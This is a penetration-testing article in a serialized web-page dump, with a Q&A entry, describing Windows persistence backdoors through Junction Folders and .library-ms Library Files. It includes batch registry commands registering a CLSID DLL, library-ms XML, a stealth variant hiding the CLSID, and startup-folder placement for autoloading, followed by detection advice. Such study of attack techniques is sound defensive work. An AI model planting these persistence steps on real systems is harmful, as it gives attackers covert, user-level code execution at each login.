[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f8Ze5dCuBpVojILIijPazRHD5KcMtlkHyxDeLcu2vDC0":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":52,"_status":50},34,"What are Library Files (.library-ms) and how are they abused for backdoor persistence?","Library Files (`.library-ms`) are XML-based Windows files that aggregate content from multiple folders into a single view. Attackers modify them, e.g., `Documents.library-ms` at `%appdata%\\Microsoft\\Windows\\Libraries`, by adding an XML element referencing a CLSID that points to a malicious DLL in the registry. When a user accesses the library (e.g., from the Start Menu or Explorer), the DLL loads. This method is similar to Junction Folders but requires an extra registry key (`ShellFolder\\Attributes`). The article at [Penetration Techniques - Backdoor Exploitation of Junction Folders and Library Files](\u002Fnews\u002Fpenetration-techniques-backdoor-exploitation-of-junction-folders-and-library-files) explains the setup and how it can be triggered at startup.","\u003Cp>Library Files (`.library-ms`) are XML-based Windows files that aggregate content from multiple folders into a single view. Attackers modify them, e.g., `Documents.library-ms` at `%appdata%\\Microsoft\\Windows\\Libraries`, by adding an XML element referencing a CLSID that points to a malicious DLL in the registry. When a user accesses the library (e.g., from the Start Menu or Explorer), the DLL loads. This method is similar to Junction Folders but requires an extra registry key (`ShellFolder\\Attributes`). The article at [Penetration Techniques - Backdoor Exploitation of Junction Folders and Library Files](\u002Fnews\u002Fpenetration-techniques-backdoor-exploitation-of-junction-folders-and-library-files) explains the setup and how it can be triggered at startup.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fpenetration-techniques-backdoor-exploitation-of-junction-folders-and-library-files\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-are-library-files-library-ms-and-how-are-they-abused-for-backdoor-persisten-1777485433806","Library Files, library-ms, persistence, CLSID, registry, DLL loading",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":20,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},10,"Penetration Techniques - Backdoor Exploitation of Junction Folders and Library Files","penetration-techniques-backdoor-exploitation-of-junction-folders-and-library-files","Explore backdoor exploitation using Windows Junction Folders and Library Files, with POC, detection methods, and insights from CIA Vault 7 leaks.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The CIA Vault 7 documents released by WikiLeaks involve the exploitation of Junction Folders and Library Files in Windows systems\u003C\u002Fp>\u003Cp>Links are as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwikileaks.org\u002Fciav7p1\u002Fcms\u002Fpage_13763381.html\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwikileaks.org\u002Fciav7p1\u002Fcms\u002Fpage_13763373.html\u003C\u002Fp>\u003Cp>Jayden Zheng analyzed this, sharing a backdoor exploitation method for Library Files, and detailed how to detect malicious use of Junction Folders and Library Files\u003C\u002Fp>\u003Cp>Links are as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.countercept.com\u002Fblog\u002Fhunting-for-junction-folder-persistence\u002F\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.countercept.com\u002Fblog\u002Fabusing-windows-library-files-for-persistence\u002F\u003C\u002Fp>\u003Cp>Based on the above references, this article will compare Junction Folders and Library Files, further exploit the backdoor method of Library Files (more covert), open-source a POC, and share insights on detection\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Methods of Utilizing Junction Folders\u003C\u002Fli>\u003Cli>Methods of Utilizing Library Files\u003C\u002Fli>\u003Cli>Further Exploitation of Library Files Backdoors\u003C\u002Fli>\u003Cli>Detection and Identification\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Methods of Utilizing Junction Folders\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Junction Folders can be simply understood as folders that can jump to another location\u003C\u002Fp>\u003Cp>Three common methods of creation:\u003C\u002Fp>\u003Cul>\u003Cli>Modifying registry entries\u003C\u002Fli>\u003Cli>Modifying desktop.ini within the folder\u003C\u002Fli>\u003Cli>Using special filenames, such as test.{ED7BA470-8E54-465E-825C-99712043E01C}\u003C\u002Fli>\u003C\u002Ful>\u003Cp>For the third method, specific CLSIDs correspond to specific file paths\u003C\u002Fp>\u003Cp>If we create a CLSID via the registry and specify a DLL path, that DLL will be loaded when opening the folder\u003C\u002Fp>\u003Ch3>1、Practical Testing\u003C\u002Fh3>\u003Cp>Test DLL executes calculator, reference download link:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch4>(1) Modify the registry and add a registry entry\u003C\u002Fh4>\u003Cp>The bat command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>SET KEY=HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{11111111-1111-1111-1111-111111111111}\\InProcServer32\u003Cbr>REG.EXE ADD %KEY% \u002FVE \u002FT REG_SZ \u002FD \"c:\\test\\calc.dll\" \u002FF\u003Cbr>REG.EXE ADD %KEY% \u002FV ThreadingModel \u002FT REG_SZ \u002FD Apartment \u002FF\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Create a new folder test.{11111111-1111-1111-1111-111111111111}\u003C\u002Fh4>\u003Ch4>(3) Select this folder to load calc.dll\u003C\u002Fh4>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>It will only load once; restarting the explorer.exe process can trigger it again\u003C\u002Fp>\u003Ch3>2. Implementation method for automatic system startup loading (user permissions)\u003C\u002Fh3>\u003Ch4>(1) Rename system folders\u003C\u002Fh4>\u003Cp>Rename %appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories to Accessories.{11111111-1111-1111-1111-111111111111}\u003C\u002Fp>\u003Ch4>(2) Create a new folder\u003C\u002Fh4>\u003Cp>Save the folder test.{11111111-1111-1111-1111-111111111111} in any of the following locations:\u003C\u002Fp>\u003Cul>\u003Cli>%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\\u003C\u002Fli>\u003Cli>Subdirectories of %appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x03 Exploitation Methods for Library Files\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>File extension is library-ms, located at %appdata%\\Microsoft\\Windows\\Libraries\u003C\u002Fp>\u003Cp>Official documentation:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fclient-management\u002Fwindows-libraries\u003C\u002Fp>\u003Cp>Simple understanding of Library Files:\u003C\u002Fp>\u003Cp>Can display contents from multiple folders simultaneously\u003C\u002Fp>\u003Ch3>1. Practical testing:\u003C\u002Fh3>\u003Ch4>(1) Modify the registry, add registry entries\u003C\u002Fh4>\u003Cp>Batch command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>SET KEY=HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{11111111-1111-1111-1111-111111111111}\\\u003Cbr>REG.EXE ADD %KEY%InProcServer32 \u002FVE \u002FT REG_SZ \u002FD \"c:\\test\\calc.dll\" \u002FF\u003Cbr>REG.EXE ADD %KEY%InProcServer32 \u002FV ThreadingModel \u002FT REG_SZ \u002FD Apartment \u002FF\u003Cbr>REG.EXE ADD %KEY%ShellFolder \u002FV Attributes \u002FT REG_DWORD \u002FD 4035969341 \u002FF\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Compared to Junction Folders, Library Files require an additional registry entry to be added.\u003C\u002Fp>\u003Ch4>(2) Modify %appdata%\\Microsoft\\Windows\\Libraries\\Documents.library-ms\u003C\u002Fh4>\u003Cp>Add the following content in XML format:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>    \u003Csearchconnectordescription publisher=\"Microsoft\" product=\"Windows\">\u003Cbr>      \u003Cdescription>@shell32.dll,-34577\u003C\u002Fdescription>\u003Cbr>      \u003Cisdefaultnonownersavelocation>true\u003C\u002Fisdefaultnonownersavelocation>\u003Cbr>      \u003Csimplelocation>\u003Cbr>        \u003Curl>shell:::{11111111-1111-1111-1111-111111111111}\u003C\u002Furl>\u003Cbr>      \u003C\u002Fsimplelocation>\u003Cbr>    \u003C\u002Fsearchconnectordescription>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) Access %appdata%\\Microsoft\\Windows\\Libraries\\Documents.library-ms\u003C\u002Fh4>\u003Cp>When opening the file, DLLs will be loaded multiple times; a mutex can be added here to prevent multiple launches. Download link (for demonstration purposes only):\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Noteworthy points:\u003C\u002Fp>\u003Cp>Includes changed from 2 locations to 3 locations\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019761917_0_5b572722a2.jpeg\">\u003C\u002Fp>\u003Cp>By examining this location, the loaded CLSID can be discovered, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019774265_1_34930c52bb.jpeg\">\u003C\u002Fp>\u003Ch3>2. Implementation method for system auto-loading at startup (user permissions)\u003C\u002Fh3>\u003Cp>Place the modified Documents.library-ms in any of the following locations:\u003C\u002Fp>\u003Cul>\u003Cli>%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\\u003C\u002Fli>\u003Cli>Subdirectories of %appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Music.library-ms and Pictures.library-ms can also be modified, or even custom-created (with specified display icons)\u003C\u002Fp>\u003Ch2>0x04 Further exploitation of Library Files backdoor\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Regarding the exploitation method of Library Files backdoor, the most obvious characteristic is that the loaded CLSID can be discovered directly from Includes\u003C\u002Fp>\u003Cp>Here is a solution:\u003C\u002Fp>\u003Cp>Clear the path and set it to not display\u003C\u002Fp>\u003Cp>Successfully hide the loaded CLSID, the final effect is as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019786530_2_57b1955ec4.jpeg\">\u003C\u002Fp>\u003Ch3>1. Implementation method\u003C\u002Fh3>\u003Cp>According to the XML format, clear the original \u003Csearchconnectordescription> and add the following code:\u003C\u002Fsearchconnectordescription>\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>    \u003Csearchconnectordescription publisher=\"Microsoft\" product=\"Windows\">\u003Cbr>      \u003Cdescription>@shell32.dll,-34577\u003C\u002Fdescription>\u003Cbr>      \u003Cisdefaultnonownersavelocation>false\u003C\u002Fisdefaultnonownersavelocation>\u003Cbr>      \u003Cissearchonlyitem>true\u003C\u002Fissearchonlyitem>\u003Cbr>      \u003Csimplelocation>\u003Cbr>        \u003Curl>shell:::{11111111-1111-1111-1111-111111111111}\u003C\u002Furl>\u003Cbr>      \u003C\u002Fsimplelocation>\u003Cbr>    \u003C\u002Fsearchconnectordescription>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. POC implemented via PowerShell\u003C\u002Fh3>\u003Cp>After testing, it is not necessary to specify \u003Cownersid>; a fixed template can be used.\u003C\u002Fownersid>\u003C\u002Fp>\u003Cp>The process is as follows:\u003C\u002Fp>\u003Cul>\u003Cli>Modify the registry\u003C\u002Fli>\u003Cli>Release Documents.library-ms in the specified directory\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Points to note in script writing:\u003C\u002Fp>\u003Col>\u003Cli>The output encoding format must be specified as UTF-8; the default UTF-16 (unicode) will cause the library-ms file format to be incorrect.\u003C\u002Fli>\u003Cli>To pass the variable $clsid into the string, double quotes \" must be used for string definition instead of single quotes '\u003C\u002Fli>\u003C\u002Fol>\u003Cp>Complete code can be referenced from:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>The code implements adding registry entries and creating the file %appdata%\\Microsoft\\Windows\\Libraries\\Documents.library-ms, which loads c:\\test\\calc.dll when the user logs in.\u003C\u002Fp>\u003Ch2>0x05 Detection and Identification\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Regarding the exploitation methods for Junction Folders and Library Files, the special aspects are:\u003C\u002Fp>\u003Cul>\u003Cli>Ordinary user permissions are sufficient\u003C\u002Fli>\u003Cli>The file format is uncommon and highly deceptive\u003C\u002Fli>\u003C\u002Ful>\u003Cp>By combining exploitation methods, each step can be inspected:\u003C\u002Fp>\u003Col>\u003Cli>Check for suspicious DLLs\u003C\u002Fli>\u003C\u002Fol>\u003Cp>Payload must be in DLL format\u003C\u002Fp>\u003Col>\u003Cli>Check for suspicious DLLs under the registry CLSID\u003C\u002Fli>\u003C\u002Fol>\u003Cp>Monitor sensitive registry locations HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID and HKEY_CURRENT_USER\\Software\\Classes\\CLSID\u003C\u002Fp>\u003Col>\u003Cli>For Junction Folders, traverse folders to check if file extensions are associated with suspicious CLSIDs\u003C\u002Fli>\u003C\u002Fol>\u003Cp>For Library Files, traverse library-ms files to check if they are associated with suspicious CLSIDs\u003C\u002Fp>\u003Cp>This can be directly referenced from Jayden Zheng's script:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgist.github.com\u002Fcountercept\u002F6890be67e09ba3daed38fa7aa6298fdf\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article tested exploitation methods for Junction Folders and Library Files, further explored backdoor exploitation methods for Library Files to enhance stealth, open-sourced a POC, discussed considerations for script writing, and finally shared insights on detection\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The CIA Vault 7 documents released by WikiLeaks involve the exploitation of Junction Folders and Library Files in Windows systems\u003C\u002Fp>\u003Cp>Links are as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwikileaks.org\u002Fciav7p1\u002Fcms\u002Fpage_13763381.html\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwikileaks.org\u002Fciav7p1\u002Fcms\u002Fpage_13763373.html\u003C\u002Fp>\u003Cp>Jayden Zheng analyzed this, sharing a backdoor exploitation method for Library Files, and detailed how to detect malicious use of Junction Folders and Library Files\u003C\u002Fp>\u003Cp>Links are as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.countercept.com\u002Fblog\u002Fhunting-for-junction-folder-persistence\u002F\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.countercept.com\u002Fblog\u002Fabusing-windows-library-files-for-persistence\u002F\u003C\u002Fp>\u003Cp>Based on the above references, this article will compare Junction Folders and Library Files, further exploit the backdoor method of Library Files (more covert), open-source a POC, and share insights on detection\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Methods of Utilizing Junction Folders\u003C\u002Fli>\u003Cli>Methods of Utilizing Library Files\u003C\u002Fli>\u003Cli>Further Exploitation of Library Files Backdoors\u003C\u002Fli>\u003Cli>Detection and Identification\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Methods of Utilizing Junction Folders\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Junction Folders can be simply understood as folders that can jump to another location\u003C\u002Fp>\u003Cp>Three common methods of creation:\u003C\u002Fp>\u003Cul>\u003Cli>Modifying registry entries\u003C\u002Fli>\u003Cli>Modifying desktop.ini within the folder\u003C\u002Fli>\u003Cli>Using special filenames, such as test.{ED7BA470-8E54-465E-825C-99712043E01C}\u003C\u002Fli>\u003C\u002Ful>\u003Cp>For the third method, specific CLSIDs correspond to specific file paths\u003C\u002Fp>\u003Cp>If we create a CLSID via the registry and specify a DLL path, that DLL will be loaded when opening the folder\u003C\u002Fp>\u003Ch3>1、Practical Testing\u003C\u002Fh3>\u003Cp>Test DLL executes calculator, reference download link:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch4>(1) Modify the registry and add a registry entry\u003C\u002Fh4>\u003Cp>The bat command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>SET KEY=HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{11111111-1111-1111-1111-111111111111}\\InProcServer32\u003Cbr>REG.EXE ADD %KEY% \u002FVE \u002FT REG_SZ \u002FD \"c:\\test\\calc.dll\" \u002FF\u003Cbr>REG.EXE ADD %KEY% \u002FV ThreadingModel \u002FT REG_SZ \u002FD Apartment \u002FF\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Create a new folder test.{11111111-1111-1111-1111-111111111111}\u003C\u002Fh4>\u003Ch4>(3) Select this folder to load calc.dll\u003C\u002Fh4>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>It will only load once; restarting the explorer.exe process can trigger it again\u003C\u002Fp>\u003Ch3>2. Implementation method for automatic system startup loading (user permissions)\u003C\u002Fh3>\u003Ch4>(1) Rename system folders\u003C\u002Fh4>\u003Cp>Rename %appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories to Accessories.{11111111-1111-1111-1111-111111111111}\u003C\u002Fp>\u003Ch4>(2) Create a new folder\u003C\u002Fh4>\u003Cp>Save the folder test.{11111111-1111-1111-1111-111111111111} in any of the following locations:\u003C\u002Fp>\u003Cul>\u003Cli>%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\\u003C\u002Fli>\u003Cli>Subdirectories of %appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x03 Exploitation Methods for Library Files\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>File extension is library-ms, located at %appdata%\\Microsoft\\Windows\\Libraries\u003C\u002Fp>\u003Cp>Official documentation:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fclient-management\u002Fwindows-libraries\u003C\u002Fp>\u003Cp>Simple understanding of Library Files:\u003C\u002Fp>\u003Cp>Can display contents from multiple folders simultaneously\u003C\u002Fp>\u003Ch3>1. Practical testing:\u003C\u002Fh3>\u003Ch4>(1) Modify the registry, add registry entries\u003C\u002Fh4>\u003Cp>Batch command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>SET KEY=HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{11111111-1111-1111-1111-111111111111}\\\u003Cbr>REG.EXE ADD %KEY%InProcServer32 \u002FVE \u002FT REG_SZ \u002FD \"c:\\test\\calc.dll\" \u002FF\u003Cbr>REG.EXE ADD %KEY%InProcServer32 \u002FV ThreadingModel \u002FT REG_SZ \u002FD Apartment \u002FF\u003Cbr>REG.EXE ADD %KEY%ShellFolder \u002FV Attributes \u002FT REG_DWORD \u002FD 4035969341 \u002FF\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Compared to Junction Folders, Library Files require an additional registry entry to be added.\u003C\u002Fp>\u003Ch4>(2) Modify %appdata%\\Microsoft\\Windows\\Libraries\\Documents.library-ms\u003C\u002Fh4>\u003Cp>Add the following content in XML format:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>    \u003Csearchconnectordescription publisher=\"Microsoft\" product=\"Windows\">\u003Cbr>      \u003Cdescription>@shell32.dll,-34577\u003C\u002Fdescription>\u003Cbr>      \u003Cisdefaultnonownersavelocation>true\u003C\u002Fisdefaultnonownersavelocation>\u003Cbr>      \u003Csimplelocation>\u003Cbr>        \u003Curl>shell:::{11111111-1111-1111-1111-111111111111}\u003C\u002Furl>\u003Cbr>      \u003C\u002Fsimplelocation>\u003Cbr>    \u003C\u002Fsearchconnectordescription>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) Access %appdata%\\Microsoft\\Windows\\Libraries\\Documents.library-ms\u003C\u002Fh4>\u003Cp>When opening the file, DLLs will be loaded multiple times; a mutex can be added here to prevent multiple launches. Download link (for demonstration purposes only):\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Noteworthy points:\u003C\u002Fp>\u003Cp>Includes changed from 2 locations to 3 locations\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019761917_0_5b572722a2-1.jpeg\">\u003C\u002Fp>\u003Cp>By examining this location, the loaded CLSID can be discovered, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019774265_1_34930c52bb-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. Implementation method for system auto-loading at startup (user permissions)\u003C\u002Fh3>\u003Cp>Place the modified Documents.library-ms in any of the following locations:\u003C\u002Fp>\u003Cul>\u003Cli>%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\\u003C\u002Fli>\u003Cli>Subdirectories of %appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Music.library-ms and Pictures.library-ms can also be modified, or even custom-created (with specified display icons)\u003C\u002Fp>\u003Ch2>0x04 Further exploitation of Library Files backdoor\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Regarding the exploitation method of Library Files backdoor, the most obvious characteristic is that the loaded CLSID can be discovered directly from Includes\u003C\u002Fp>\u003Cp>Here is a solution:\u003C\u002Fp>\u003Cp>Clear the path and set it to not display\u003C\u002Fp>\u003Cp>Successfully hide the loaded CLSID, the final effect is as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019786530_2_57b1955ec4-1.jpeg\">\u003C\u002Fp>\u003Ch3>1. Implementation method\u003C\u002Fh3>\u003Cp>According to the XML format, clear the original \u003Csearchconnectordescription> and add the following code:\u003C\u002Fsearchconnectordescription>\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>    \u003Csearchconnectordescription publisher=\"Microsoft\" product=\"Windows\">\u003Cbr>      \u003Cdescription>@shell32.dll,-34577\u003C\u002Fdescription>\u003Cbr>      \u003Cisdefaultnonownersavelocation>false\u003C\u002Fisdefaultnonownersavelocation>\u003Cbr>      \u003Cissearchonlyitem>true\u003C\u002Fissearchonlyitem>\u003Cbr>      \u003Csimplelocation>\u003Cbr>        \u003Curl>shell:::{11111111-1111-1111-1111-111111111111}\u003C\u002Furl>\u003Cbr>      \u003C\u002Fsimplelocation>\u003Cbr>    \u003C\u002Fsearchconnectordescription>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. POC implemented via PowerShell\u003C\u002Fh3>\u003Cp>After testing, it is not necessary to specify \u003Cownersid>; a fixed template can be used.\u003C\u002Fownersid>\u003C\u002Fp>\u003Cp>The process is as follows:\u003C\u002Fp>\u003Cul>\u003Cli>Modify the registry\u003C\u002Fli>\u003Cli>Release Documents.library-ms in the specified directory\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Points to note in script writing:\u003C\u002Fp>\u003Col>\u003Cli>The output encoding format must be specified as UTF-8; the default UTF-16 (unicode) will cause the library-ms file format to be incorrect.\u003C\u002Fli>\u003Cli>To pass the variable $clsid into the string, double quotes \" must be used for string definition instead of single quotes '\u003C\u002Fli>\u003C\u002Fol>\u003Cp>Complete code can be referenced from:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>The code implements adding registry entries and creating the file %appdata%\\Microsoft\\Windows\\Libraries\\Documents.library-ms, which loads c:\\test\\calc.dll when the user logs in.\u003C\u002Fp>\u003Ch2>0x05 Detection and Identification\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Regarding the exploitation methods for Junction Folders and Library Files, the special aspects are:\u003C\u002Fp>\u003Cul>\u003Cli>Ordinary user permissions are sufficient\u003C\u002Fli>\u003Cli>The file format is uncommon and highly deceptive\u003C\u002Fli>\u003C\u002Ful>\u003Cp>By combining exploitation methods, each step can be inspected:\u003C\u002Fp>\u003Col>\u003Cli>Check for suspicious DLLs\u003C\u002Fli>\u003C\u002Fol>\u003Cp>Payload must be in DLL format\u003C\u002Fp>\u003Col>\u003Cli>Check for suspicious DLLs under the registry CLSID\u003C\u002Fli>\u003C\u002Fol>\u003Cp>Monitor sensitive registry locations HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID and HKEY_CURRENT_USER\\Software\\Classes\\CLSID\u003C\u002Fp>\u003Col>\u003Cli>For Junction Folders, traverse folders to check if file extensions are associated with suspicious CLSIDs\u003C\u002Fli>\u003C\u002Fol>\u003Cp>For Library Files, traverse library-ms files to check if they are associated with suspicious CLSIDs\u003C\u002Fp>\u003Cp>This can be directly referenced from Jayden Zheng's script:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgist.github.com\u002Fcountercept\u002F6890be67e09ba3daed38fa7aa6298fdf\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article tested exploitation methods for Junction Folders and Library Files, further explored backdoor exploitation methods for Library Files to enhance stealth, open-sourced a POC, discussed considerations for script writing, and finally shared insights on detection\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1772,"Onedaysec",4,"published","2026-02-02T08:20:29.495Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Windows Backdoor Exploitation: Junction Folders & Library Files","Windows backdoor, junction folders, library files, persistence, CIA Vault 7, registry exploitation, DLL loading, detection techniques",null,false,[],{"docs":43,"hasNextPage":40},[44,45,4,46],36,35,33,{"title":39,"description":39,"image":39},"2026-07-24T15:37:15.864Z","2026-07-23T16:00:54.459Z","draft","2026-07-23T16:03:04.091Z","2026-07-23T16:03:04.090Z"]